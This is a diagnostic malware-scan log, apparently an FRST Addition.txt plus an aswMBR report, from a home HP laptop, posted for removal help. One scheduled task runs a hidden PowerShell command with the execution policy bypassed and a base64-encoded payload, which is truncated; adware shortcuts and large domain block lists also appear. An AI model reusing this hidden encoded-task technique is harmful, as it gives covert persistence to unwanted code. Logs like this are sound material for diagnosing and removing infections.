Task: {5AA23701-E548-42E8-8807-A8AC6914BC39} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-01-12] (Hewlett-Packard Company)
Task: {5AE6EF17-0F12-4444-8255-89C8BB6E4628} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [2016-02-09] (Microsoft Corporation)
Task: {6546A02A-83CC-4FF5-902D-3014E7B66225} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Active Health Launcher => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-01-20] (Hewlett-Packard)
Task: {68378BB1-53EC-4C77-949B-C806FF502CEC} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [2014-06-24] (Safer-Networking Ltd.)
Task: {79A6644D-454B-49A9-96AD-F1815FE7CB01} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-23] (Google Inc.)
Task: {840D75F4-6B63-425A-9218-F311DA896CDD} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [2014-06-27] (Safer-Networking Ltd.)
Task: {855913D5-AD47-4E5E-AE26-9820E15453B9} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-12-21] (Hewlett-Packard Company)
Task: {868E6E9F-5088-428A-966A-08CA9064672B} - System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\54.0\mcdatrep.exe [2016-02-11] (McAfee, Inc.)
Task: {AAD4C20A-745E-4F5B-89C1-55960794CB50} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent
Task: {AB055FD9-966F-40AB-8ADD-5A7B473AEC55} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee Anti-Virus And Anti-Spyware\upgrade.exe [2015-11-03] (McAfee, Inc.)
Task: {B1FA90AE-9C36-4B18-AC74-D64135779166} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-12-21] (Hewlett-Packard Company)
Task: {B4EECBD3-45D1-444D-BF90-2D3EC12F2F7C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-02-17] (Hewlett-Packard)
Task: {D1CAD731-070B-4B9F-A9F9-1FB6BED3BDB1} - System32\Tasks\{7D7F0447-7D0E-0B7A-7E11-7F7D0905110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9444 more characters).
Task: {DF03C2BA-FAA1-40E7-BB74-12E596E53688} - System32\Tasks\McAfee\McAfee Idle Detection Task
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForFawn.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\Users\Fawn\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RebateAll\RebateAll.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://rebateall.com/activation2/?dp=0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0E
ShortcutWithArgument: C:\Users\Fawn\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\RebateAll.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://rebateall.com/activation2/?dp=0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0E
ShortcutWithArgument: C:\Users\Fawn\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\AmazonShopping.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://www.amazon.com/gp/bit/amazonbookmark.html?tag=hp2-desktop-us-20&partner=HP
ShortcutWithArgument: C:\Users\Public\Desktop\Get Dropbox Offer.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://js.redirect.hp.com/jumpstation?bd=all&c=143&locale=en_us&pf=cnnb&s=db_dticon&tp=dropbox
==================== Loaded Modules (Whitelisted) ==============
2016-03-03 17:55 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2016-03-03 17:55 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2016-03-03 17:55 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
2016-03-03 17:55 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
2016-03-03 17:55 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2016-02-20 12:02 - 2016-02-17 20:14 - 01630360 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libglesv2.dll
2016-02-20 12:02 - 2016-02-17 20:14 - 00085656 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libegl.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"
==================== EXE Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com
IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com
IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com
IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com
IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com
There are 7872 more sites.
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\007guard.com -> install.007guard.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\008k.com -> www.008k.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\00hq.com -> www.00hq.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\010402.com -> 010402.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\0scan.com -> www.0scan.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\10sek.com -> www.10sek.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\123simsen.com -> www.123simsen.com
There are 7872 more sites.
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2013-08-22 05:25 - 2016-03-03 19:07 - 00451004 ____R C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 www.007guard.com
127.0.0.1 007guard.com
127.0.0.1 008i.com
127.0.0.1 www.008k.com
127.0.0.1 008k.com
127.0.0.1 www.00hq.com
127.0.0.1 00hq.com
127.0.0.1 010402.com
127.0.0.1 www.032439.com
127.0.0.1 032439.com
127.0.0.1 www.0scan.com
127.0.0.1 0scan.com
127.0.0.1 1000gratisproben.com
127.0.0.1 www.1000gratisproben.com
127.0.0.1 1001namen.com
127.0.0.1 www.1001namen.com
127.0.0.1 100888290cs.com
127.0.0.1 www.100888290cs.com
127.0.0.1 www.100sexlinks.com
127.0.0.1 100sexlinks.com
127.0.0.1 10sek.com
127.0.0.1 www.10sek.com
127.0.0.1 www.1-2005-search.com
127.0.0.1 1-2005-search.com
127.0.0.1 123fporn.info
127.0.0.1 www.123fporn.info
127.0.0.1 123haustiereundmehr.com
127.0.0.1 www.123haustiereundmehr.com
127.0.0.1 123moviedownload.com
127.0.0.1 www.123moviedownload.com
There are 15472 more lines.
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-4258770641-917365270-2992294631-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Hewlett-Packard Backgrounds\backgroundDefault.jpg
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(Currently there is no automatic fix for this section.)
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{E3864FAE-6A64-49A4-8EC9-93ED035533C8}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{0E191CF9-EFB6-47F7-ABCD-FDC2DADA84F4}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{5E267825-C5FF-452A-BB7B-D61D1BAD5214}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{5D8C4951-5247-4508-9227-738C2E481BBE}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{D2F776E5-A0FF-460E-AA6F-2BF364B356A4}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPSOCKSVC.exe
FirewallRules: [{3C2C7B6D-7FA7-4A1A-8F9B-6303B534F974}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{B27066B6-B172-48F5-9D12-CCDD387530E5}] => (Allow) LPort=15600
FirewallRules: [{B6561EA3-49FD-4DA8-A039-364D5B0A1C84}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [{DE3C52FC-975B-420C-8848-2DE54A0C9AF8}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B94C8BC6-6BB9-48D4-9486-3B2866AA6B72}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A9A46FF2-CECB-4F9F-9721-3E9B07F6BFF0}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service
==================== Restore Points =========================
04-03-2016 05:39:24 McAfee Vulnerability Scanner
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (03/04/2016 09:07:45 AM) (Source: DptfEvent) (EventID: 2) (User: )
Description: DptfPolicyLpmServiceHelper
WinMain: CreateSharedMemory() failed.
Session ID = 1
Error: (03/04/2016 09:07:45 AM) (Source: DptfEvent) (EventID: 3) (User: )
Description: DptfPolicyLpmServiceHelper
CreateSharedMemory: WaitForSingleObject() with g_pkeLpmSharedMemoryCreated failed
Last error = [0x00000102]
Session ID = 1
Error: (03/03/2016 10:51:13 PM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)
Description: Chrome has encountered a fatal error.
ver=48.0.2564.116;lang=;guid=6B6C2921933C4069AC6D10216E3EE726;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\1e9c8a81-9089-4f7e-97fa-a873753b1cb9.dmp
Error: (03/03/2016 08:04:20 PM) (Source: Microsoft-Windows-RestartManager) (EventID: 10007) (User: NT AUTHORITY)
Description: Application or service 'HPWMISVC' could not be restarted.
Error: (03/03/2016 05:51:30 PM) (Source: DptfEvent) (EventID: 2) (User: )
Description: DptfPolicyLpmServiceHelper
WinMain: CreateSharedMemory() failed.
Session ID = 1
Error: (03/03/2016 05:51:30 PM) (Source: DptfEvent) (EventID: 3) (User: )
Description: DptfPolicyLpmServiceHelper
CreateSharedMemory: WaitForSingleObject() with g_pkeLpmSharedMemoryCreated failed
Last error = [0x00000102]
Session ID = 1
Error: (03/03/2016 05:32:59 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program IEXPLORE.EXE version 11.0.9600.18124 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
Process ID: 1e8
Start Time: 01d175b518e46520
Termination Time: 15
Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Report Id: 04908aea-e1a9-11e5-8274-d85de287d87e
Faulting package full name:
Faulting package-relative application ID:
Error: (03/03/2016 05:28:03 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 11.0.9600.18123 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
Process ID: 63c
Start Time: 01d175b4af4ee3db
Termination Time: 0
Application Path: C:\Program Files\Internet Explorer\iexplore.exe
Report Id: 503e36bc-e1a8-11e5-8274-d85de287d87e
Faulting package full name:
Faulting package-relative application ID:
Error: (03/03/2016 05:26:36 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program IEXPLORE.EXE version 11.0.9600.18124 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
Process ID: ce8
Start Time: 01d175b4af7c314d
Termination Time: 52
Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Report Id: 2007fa25-e1a8-11e5-8274-d85de287d87e
Faulting package full name:
Faulting package-relative application ID:
Error: (03/03/2016 04:24:25 PM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)
Description: Chrome has encountered a fatal error.
ver=48.0.2564.116;lang=;guid=6B6C2921933C4069AC6D10216E3EE726;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\8ab6acec-cd82-4048-9469-19bd029fa366.dmp
System errors:
=============
Error: (03/04/2016 09:02:43 AM) (Source: DCOM) (EventID: 10016) (User: FAWNS)
Description: application-specificLocalLaunch{7022A3B3-D004-4F52-AF11-E9E987FEE25F}{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}FawnsFawnS-1-5-21-4258770641-917365270-2992294631-1001LocalHost (Using LRPC)UnavailableUnavailable
Error: (03/04/2016 09:02:42 AM) (Source: DCOM) (EventID: 10016) (User: FAWNS)
Description: application-specificLocalLaunch{7022A3B3-D004-4F52-AF11-E9E987FEE25F}{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}FawnsFawnS-1-5-21-4258770641-917365270-2992294631-1001LocalHost (Using LRPC)UnavailableUnavailable
Error: (03/04/2016 09:02:42 AM) (Source: DCOM) (EventID: 10016) (User: FAWNS)
Description: application-specificLocalLaunch{7022A3B3-D004-4F52-AF11-E9E987FEE25F}{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}FawnsFawnS-1-5-21-4258770641-917365270-2992294631-1001LocalHost (Using LRPC)UnavailableUnavailable
Error: (03/04/2016 09:02:42 AM) (Source: DCOM) (EventID: 10016) (User: FAWNS)
Description: application-specificLocalLaunch{7022A3B3-D004-4F52-AF11-E9E987FEE25F}{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}FawnsFawnS-1-5-21-4258770641-917365270-2992294631-1001LocalHost (Using LRPC)UnavailableUnavailable
Error: (03/04/2016 09:01:37 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
Module Path: C:\Windows\System32\bcmihvsrv64.dll
Error: (03/04/2016 09:01:37 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
Module Path: C:\Windows\System32\bcmihvsrv64.dll
Error: (03/04/2016 09:01:34 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
Module Path: C:\Windows\System32\bcmihvsrv64.dll
Error: (03/04/2016 09:00:51 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Search service, but this action failed with the following error:
%%1056
Error: (03/04/2016 09:00:26 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Spybot-S&D 2 Updating Service service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
Error: (03/04/2016 09:00:25 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Spybot-S&D 2 Security Center Service service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
==================== Memory info ===========================
Processor: Intel(R) Celeron(R) CPU N2840 @ 2.16GHz
Percentage of memory in use: 65%
Total physical RAM: 1939.04 MB
Available physical RAM: 666.2 MB
Total Virtual: 3878.07 MB
Available Virtual: 1542.62 MB
==================== Drives ================================
Drive c: (Windows) (Fixed) (Total:21.13 GB) (Free:4.65 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (Size: 29.1 GB) (Disk ID: 1E53D2DD)
Partition: GPT.
==================== End of Addition.txt ============================
aswMBR version 1.0.1.2252 Copyright(c) 2014 AVAST Software
Run date: 2016-03-04 11:12:18
-----------------------------
11:12:18.458 OS Version: Windows x64 6.2.9200
11:12:18.474 Number of processors: 2 586 0x3708
11:12:18.474 ComputerName: FAWNS UserName: Fawn
11:12:18.505 Initialize success
11:12:18.520 VM: initialized successfully
11:12:18.520 VM: Intel CPU BiosDisabled
11:13:09.926 AVAST engine defs: 16030400
11:13:22.387 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\00000028
11:13:22.387 Disk 0 Vendor: VID:15 0.1 Size: 29820MB BusType: 12
11:13:22.403 Disk 0 MBR read successfully
11:13:22.403 Disk 0 MBR scan
11:13:22.419 Disk 0 unknown MBR code
11:13:22.419 Disk 0 Partition 1 00 EE GPT 2097151 MB offset 1
11:13:22.450 Disk 0 scanning C:\Windows\system32\drivers
11:13:22.825 Disk 0 statistics 3842/0/0 @ 29.78 MB/s
11:13:22.825 Scan stopped
11:13:26.515 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\00000028
11:13:26.515 Disk 0 Vendor: VID:15 0.1 Size: 29820MB BusType: 12
11:13:26.531 Disk 0 MBR read successfully
11:13:26.546 Disk 0 MBR scan
11:13:26.562 Disk 0 unknown MBR code
11:13:26.562 Disk 0 Partition 1 00 EE GPT 2097151 MB offset 1
11:13:26.593 Disk 0 scanning C:\Windows\system32\drivers
11:13:28.546 Service scanning
11:13:44.542 Modules scanning
11:13:44.573 Disk 0 trace - called modules:
11:13:44.588 ntoskrnl.exe CLASSPNP.SYS disk.sys sdstor.sys ACPI.sys sdbus.sys hal.dll
11:13:44.604 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xffffe000a5ae1060]
11:13:44.619 3 CLASSPNP.SYS[fffff8000305b170] -> nt!IofCallDriver -> \Device\00000028[0xffffe000a5ad2050]
11:13:44.619 5 sdstor.sys[fffff800035c1ebe] -> nt!IofCallDriver -> [0xffffe000a5a0ebe0]
11:13:44.635 7 ACPI.sys[fffff80002567c21] -> nt!IofCallDriver -> \Device\SdBus-0[0xffffe000a5acd060]
11:13:44.713 AVAST engine scan C:\Windows
11:13:45.356 AVAST engine scan C:\Windows\system32
11:14:44.522 AVAST engine scan C:\Windows\system32\drivers
11:14:46.277 AVAST engine scan C:\Users\Fawn
11:16:19.709 AVAST engine scan C:\ProgramData
11:16:30.592 Disk 0 statistics 1270889/0/0 @ 7.23 MB/s
11:16:30.608 Scan finished successfully
11:16:58.380 Disk 0 MBR has been saved successfully to "C:\Users\Fawn\Desktop\MBR.dat"
11:16:58.395 The log file has been saved successfully to "C:\Users\Fawn\Desktop\aswMBR.txt"